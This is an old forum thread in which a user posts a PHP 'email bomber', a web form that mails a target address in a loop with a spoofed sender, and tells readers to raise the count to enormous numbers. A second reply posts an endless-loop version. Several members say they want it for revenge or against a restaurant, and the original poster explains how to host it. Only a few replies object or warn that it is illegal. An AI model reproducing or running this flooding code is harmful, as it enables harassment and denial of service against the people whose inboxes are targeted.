Adblock breaks this site

[PHP] Email Bomber

Discussion in 'Web Programming' started by Waffles, Nov 3, 2007.

  1. Waffles

    Waffles Guest

    Referrals:
    4
    [PHP] Email Bomber

    Code:
    <?php
    //Copy Righted Waffles./scheols
    $hackedemail = $_POST['emailhacked'];
    if(isset($_POST['hack'])){
    $hack = 1;
    $user = "FUCKEN GOT HACKED ROTFL";
    while($hack <= 10){
    mail($hackedemail,"Hacked","Fucken Got Pwned", "From: " ."Got Hacked. - ". $user. "<" . $hackedemail . ">\n");
    echo "Hacked";
    $hack++;
    }
    }elseif(!isset($_POST['hack'])){
    ?>
    <form method='post'>
    <input type='text' name='emailhacked'><br>
    <input type='submit' name='hack' value='Hack Person'>
    </form>
    <? } ?>
    while($hack <= 10){

    change 10 to like 100000000000000000000000
     
  2. ColZy

    ColZy Active Member
    Banned

    Joined:
    Oct 30, 2007
    Posts:
    213
    Referrals:
    0
    Sythe Gold:
    0
    [PHP] Email Bomber

    what does this do ?..
     
  3. Waffles

    Waffles Guest

    Referrals:
    4
    [PHP] Email Bomber

    You can bomb someone's email with it, thus you send 1000000 emails with it to the inbox of the person.
     
  4. Tgump

    Tgump Hero
    Retired Global Moderator Zombie

    Joined:
    Jan 21, 2007
    Posts:
    6,541
    Referrals:
    8
    Sythe Gold:
    0
    Two Factor Authentication User
    [PHP] Email Bomber

    WAGGLES

    WTF LONGCAT.

    Lol I will use this. Thanks.
     
  5. jackc

    jackc Guru
    Do Not Trade

    Joined:
    Apr 26, 2007
    Posts:
    1,976
    Referrals:
    1
    Sythe Gold:
    0
    [PHP] Email Bomber

    how do you use it? im stupid when it comes to this stuff. if you can tgump, please pm me and tell me how, i wana do this to some restraunt lol...
     
  6. Ciz3d

    Ciz3d Member

    Joined:
    Oct 9, 2007
    Posts:
    86
    Referrals:
    0
    Sythe Gold:
    0
    [PHP] Email Bomber

    Can you pm me to is you know how to use it for some explanation :D
    Tyvm
     
  7. ColZy

    ColZy Active Member
    Banned

    Joined:
    Oct 30, 2007
    Posts:
    213
    Referrals:
    0
    Sythe Gold:
    0
    [PHP] Email Bomber

    do we put it onto a notepad and save it as a webpage?
     
  8. gamer716

    gamer716 Forum Addict
    Banned

    Joined:
    Apr 6, 2007
    Posts:
    490
    Referrals:
    0
    Sythe Gold:
    0
    [PHP] Email Bomber

    confusing but i can use this is get revenge on the ppl i hate
     
  9. Nick

    Nick ♬♩ Young Forever ♪ ♫

    Joined:
    Feb 12, 2007
    Posts:
    7,204
    Referrals:
    40
    Sythe Gold:
    80
    [PHP] Email Bomber

    Can you explain a bit more how this works? Thanks
     
  10. cp

    cp an cat
    Banned

    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0
    [PHP] Email Bomber

    Please, if you're going to make something destructive, keep it to yourself (or distribute it discreetly).

    People like you are what make the people who code for the general purpose of good look bad.

    Besides, what's the point of copyrighting it? It's badly coded, and requires you to modify the code just to get your desired output.

    Also, this is not hacking (I'm waiting for a reply with something along the lines of "i no it wuznt hackin im just sayin").
     
  11. ccaveman

    ccaveman Forum Addict

    Joined:
    May 1, 2006
    Posts:
    314
    Referrals:
    0
    Sythe Gold:
    0
    [PHP] Email Bomber

    i no it wuznt hackin im just sayin.





    or is it? dun dun dun. No it's not.
     
  12. xenonium

    xenonium Guest

    Referrals:
    0
    [PHP] Email Bomber

    ok its cool but your hoster will shut down you fast and its easy to track
     
  13. Holdom

    Holdom Guest

    Referrals:
    0
    [PHP] Email Bomber

    Ok guys.. you do realize this stuff is Illegal? But use at your own risk. Just wanted to warn ya.
     
  14. Annex

    Annex Ballin'
    Veteran (Ex-Admin)
    PHP Programmers Retired Administrator

    Joined:
    Aug 28, 2005
    Posts:
    2,324
    Referrals:
    3
    Sythe Gold:
    0
    UWotM8?
    [PHP] Email Bomber

    Use this on your website at your own discretion, Your host will likely boot you off for spamming, as you will probably be blacklisted for sending such a large amount of emails in the course of a few minutes.
     
  15. The_Flames

    The_Flames Apprentice

    Joined:
    Nov 25, 2007
    Posts:
    858
    Referrals:
    3
    Sythe Gold:
    0
    [PHP] Email Bomber

    I cant get it to work :S
     
  16. Typhoon

    Typhoon Forum Addict

    Joined:
    Jan 21, 2007
    Posts:
    452
    Referrals:
    0
    Sythe Gold:
    0
    [PHP] Email Bomber

    1 word. NO.
    Code:
    <?php
    $i =1;
    do {
    mail("[email protected]", "subject", "message", "From: [email protected]"); 
    } while ($i > 0);
    ?> 
    
     
  17. cp

    cp an cat
    Banned

    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0
    [PHP] Email Bomber

    Yeah typhoon, your destructive code makes you leet.
     
  18. Waffles

    Waffles Guest

    Referrals:
    4
    [PHP] Email Bomber

    You can use this email bomber by uploading it to your localhost, or to free website hosting.
     
  19. cp

    cp an cat
    Banned

    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0
    [PHP] Email Bomber

    You don't upload things to your "localhost". It most likely will not work on a free host because they generally have sendmail disabled.

    And also, I just noticed your copyright on the top of the script, made me lol a bit.
     
  20. sathish

    sathish Newcomer

    Joined:
    Apr 12, 2009
    Posts:
    1
    Referrals:
    0
    Sythe Gold:
    0
    [PHP] Email Bomber

    how to do excuite this code tell me
     
< Looking for some help | [PHP] RC4 Encrypted IP Logging >


 
 
Adblock breaks this site